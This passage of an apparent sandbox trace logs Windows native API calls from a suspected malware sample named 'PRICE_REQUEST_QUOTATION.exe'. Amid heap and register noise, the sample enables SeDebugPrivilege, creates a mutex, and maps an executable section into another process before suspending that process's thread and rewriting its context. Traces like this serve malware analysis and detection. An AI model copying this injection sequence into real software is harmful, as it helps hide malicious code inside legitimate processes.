(HeapHandle=0x470000, Flags=0x0, BaseAddress=0x474358) returned 1 [0105.450] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x475360) returned 1 [0105.450] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47a368) returned 1 [0105.450] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47f370) returned 1 [0105.480] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x473350 [0105.480] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x474358 [0105.480] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x475360 [0105.480] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2000) returned 0x476368 [0105.480] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x475360) returned 1 [0105.481] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x3000) returned 0x478370 [0105.482] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x476368) returned 1 [0105.482] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4000) returned 0x47b378 [0105.483] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x478370) returned 1 [0105.483] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5000) returned 0x475360 [0105.484] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47b378) returned 1 [0105.484] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x47a368 [0105.484] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2000) returned 0x47b370 [0105.484] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47a368) returned 1 [0105.484] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x3000) returned 0x47d378 [0105.485] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47b370) returned 1 [0105.485] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4000) returned 0x480380 [0105.485] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47d378) returned 1 [0105.485] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5000) returned 0x47a368 [0105.485] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x480380) returned 1 [0105.485] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1000) returned 0x47f370 [0105.485] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2000) returned 0x480378 [0105.485] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47f370) returned 1 [0105.485] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x3000) returned 0x482380 [0105.486] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x480378) returned 1 [0105.486] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4000) returned 0x485388 [0105.486] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x482380) returned 1 [0105.486] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5000) returned 0x47f370 [0105.486] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x485388) returned 1 [0105.486] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x473350) returned 1 [0105.486] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x474358) returned 1 [0105.486] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x475360) returned 1 [0105.486] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47a368) returned 1 [0105.486] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47f370) returned 1 [0105.487] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19f18c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0105.487] NtCreateFile (in: FileHandle=0x19f1ac, DesiredAccess=0x120089, ObjectAttributes=0x19f174*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f194, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f1ac*=0x6c, IoStatusBlock=0x19f194*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0105.487] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x472760) returned 1 [0105.487] NtQueryInformationFile (in: FileHandle=0x6c, IoStatusBlock=0x19f194, FileInformation=0x19ef08, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x19f194, FileInformation=0x19ef08) returned 0x0 [0105.487] NtClose (Handle=0x6c) returned 0x0 [0105.487] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x208) returned 0x473350 [0105.487] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x473350) returned 1 [0105.493] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x62fb11d0, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f1c8, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f1c8*(BaseAddress=0x62fb1000, AllocationBase=0x62fb0000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0106.059] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x19f220, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x19f220, ResultLength=0x0) returned 0x0 [0106.087] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x19f244, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19f244, ReturnLength=0x0) returned 0x0 [0106.124] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x83f020) returned 1 [0106.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19eed4*=0x0, ZeroBits=0x0, RegionSize=0x19eed8*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19eed4*=0x20000, RegionSize=0x19eed8*=0x10000) returned 0x0 [0106.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0xc0000004 [0106.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f234*=0x20000, RegionSize=0x19eef8, FreeType=0x8000) returned 0x0 [0106.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19eec0*=0x0, ZeroBits=0x0, RegionSize=0x19eec4*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19eec0*=0x20000, RegionSize=0x19eec4*=0x20000) returned 0x0 [0106.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0x0 [0106.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f234*=0x20000, RegionSize=0x19f238, FreeType=0x8000) returned 0x0 [0106.208] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19eff0 | out: Value="RDhJ0CNFevzX") returned 0x0 [0106.208] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32.dll", BaseAddress=0x19f060 | out: BaseAddress=0x19f060*=0x76a90000) returned 0x0 [0106.247] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x19f24c | out: TokenHandle=0x19f24c*=0x80) returned 0x0 [0106.252] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19f240 | out: lpLuid=0x19f240*(LowPart=0x14, HighPart=0)) returned 1 [0106.262] NtAdjustPrivilegesToken (in: TokenHandle=0x80, DisableAllPrivileges=0, NewState=0x19f23c, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x0 [0106.288] NtClose (Handle=0x80) returned 0x0 [0106.288] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19eb80 | out: Value="RDhJ0CNFevzX") returned 0x0 [0106.293] NtOpenDirectoryObject (in: FileHandle=0x19f040, DesiredAccess=0x2000f, ObjectAttributes=0x19f00c*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0x19f040*=0x80) returned 0x0 [0106.296] NtCreateMutant (in: MutantHandle=0x19f26c, DesiredAccess=0x1f0001, ObjectAttributes=0x19eff4*(Length=0x18, RootDirectory=0x80, ObjectName="14-ARU9TUYI8wI3z", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0x19f26c*=0xa4) returned 0x0 [0106.296] NtClose (Handle=0x80) returned 0x0 [0106.296] NtClose (Handle=0xa4) returned 0x0 [0106.297] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19e604 | out: Value="RDhJ0CNFevzX") returned 0x0 [0106.313] RtlSetEnvironmentVariable (in: Environment=0x0, Name="14-ARU9T", Value="C:\\Users\\RDhJ0CNFevzX\\Desktop\\PRICE_REQUEST_QUOTATION.exe" | out: Environment=0x0) returned 0x0 [0106.316] NtCreateSection (in: SectionHandle=0x19ed18, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19eab8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19ed18*=0xa4) returned 0x0 [0106.323] NtMapViewOfSection (in: SectionHandle=0xa4, ProcessHandle=0xffffffff, BaseAddress=0x19ed1c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19eab8*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19ed1c*=0x1d0000, SectionOffset=0x0, ViewSize=0x19eab8*=0x29000) returned 0x0 [0106.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e420*=0x0, ZeroBits=0x0, RegionSize=0x19e424*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19e420*=0x30000, RegionSize=0x19e424*=0x10000) returned 0x0 [0106.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x30000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x30000, ResultLength=0x0) returned 0xc0000004 [0106.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19eaac*=0x30000, RegionSize=0x19e444, FreeType=0x8000) returned 0x0 [0106.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e40c*=0x0, ZeroBits=0x0, RegionSize=0x19e410*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19e40c*=0x570000, RegionSize=0x19e410*=0x20000) returned 0x0 [0106.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x570000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x570000, ResultLength=0x0) returned 0x0 [0106.348] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea94*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea68*(UniqueProcess=0x664, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x80) returned 0x0 [0106.348] NtQueryInformationProcess (in: ProcessHandle=0x80, ProcessInformationClass=0x1a, ProcessInformation=0x19e780, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19e780, ReturnLength=0x0) returned 0x0 [0106.348] NtCreateSection (in: SectionHandle=0x19e41c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e3dc, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e41c*=0xa8) returned 0x0 [0106.349] NtMapViewOfSection (in: SectionHandle=0xa8, ProcessHandle=0xffffffff, BaseAddress=0x19e424*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e3dc*=0xecc00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e424*=0x8a0000, SectionOffset=0x0, ViewSize=0x19e3dc*=0xed000) returned 0x0 [0106.358] NtMapViewOfSection (in: SectionHandle=0xa8, ProcessHandle=0x80, BaseAddress=0x19e420*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e418*=0xecc00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e420*=0xa6e0000, SectionOffset=0x0, ViewSize=0x19e418*=0xed000) returned 0x0 [0112.576] NtClose (Handle=0xa8) returned 0x0 [0112.600] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2000) returned 0x47a788 [0112.619] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19e0e8 | out: TokenHandle=0x19e0e8*=0xa8) returned 0x0 [0112.623] NtQueryInformationToken (in: TokenHandle=0xa8, TokenInformationClass=0x1, TokenInformation=0x19d8e0, TokenInformationLength=0x400, ReturnLength=0x19e0e0 | out: TokenInformation=0x19d8e0, ReturnLength=0x19e0e0) returned 0x0 [0112.624] ConvertSidToStringSidW (in: Sid=0x19d8e8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0x19e0e4 | out: StringSid=0x19e0e4*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0112.625] NtClose (Handle=0xa8) returned 0x0 [0112.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e358*=0x0, ZeroBits=0x0, RegionSize=0x19e35c*=0x10636, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19e358*=0x590000, RegionSize=0x19e35c*=0x11000) returned 0x0 [0112.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e344*=0x0, ZeroBits=0x0, RegionSize=0x19e348*=0x10636, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19e344*=0x5b0000, RegionSize=0x19e348*=0x11000) returned 0x0 [0112.636] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e358*=0x41d5b6, NumberOfBytesToProtect=0x19e35c, NewAccessProtection=0x40, OldAccessProtection=0x19e3a4 | out: BaseAddress=0x19e358*=0x41d000, NumberOfBytesToProtect=0x19e35c, OldAccessProtection=0x19e3a4*=0x40) returned 0x0 [0112.637] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47a788) returned 1 [0112.645] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19e150, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.647] NtCreateFile (in: FileHandle=0x19e170, DesiredAccess=0x120089, ObjectAttributes=0x19e138*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e158, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e170*=0xa8, IoStatusBlock=0x19e158*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0112.647] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x472520) returned 1 [0112.651] NtQueryInformationFile (in: FileHandle=0xa8, IoStatusBlock=0x19e158, FileInformation=0x19decc, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x19e158, FileInformation=0x19decc) returned 0x0 [0112.651] NtClose (Handle=0xa8) returned 0x0 [0112.651] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x208) returned 0x4705c8 [0112.651] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x4705c8) returned 1 [0113.399] NtOpenProcess (in: ProcessHandle=0x19e358, DesiredAccess=0x438, ObjectAttributes=0x19d908*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19d948*(UniqueProcess=0x664, UniqueThread=0x0) | out: ProcessHandle=0x19e358*=0xa8) returned 0x0 [0113.403] NtQueryInformationProcess (in: ProcessHandle=0xa8, ProcessInformationClass=0x0, ProcessInformation=0x19d958, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x19d958, ReturnLength=0x0) returned 0x0 [0113.412] NtOpenThread (in: ThreadHandle=0x19d900, DesiredAccess=0x1a, ObjectAttributes=0x19d908, ClientId=0x19d938*(UniqueProcess=0x0, UniqueThread=0x668) | out: ThreadHandle=0x19d900*=0xac) returned 0x0 [0113.419] NtSuspendThread (in: ThreadHandle=0xac, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0113.429] NtGetContextThread (in: ThreadHandle=0xac, Context=0x19de50 | out: Context=0x19de50*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x6, [73]=0x84, [74]=0x36, [75]=0xdf, [76]=0x26, [77]=0x8b, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x1, SegGs=0x0, SegFs=0x616920, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0xffffffff, SegCs=0xffffffff, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf0, [5]=0xcf, [6]=0xc, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0x38, [23]=0x5d, [24]=0xfc, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0x40, [29]=0x41, [30]=0x61, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0xce, [39]=0x5c, [40]=0xfc, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0x34, [45]=0x20, [46]=0x99, [47]=0x5e, [48]=0xfc, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x30, [213]=0xf1, [214]=0x25, [215]=0xb7, [216]=0xef, [217]=0x47, [218]=0x1a, [219]=0x10, [220]=0xa5, [221]=0xf1, [222]=0x2, [223]=0x60, [224]=0x8c, [225]=0x9e, [226]=0xeb, [227]=0xac, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0113.436] NtSetContextThread (ThreadHandle=0xac, Context=0x19de50*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, 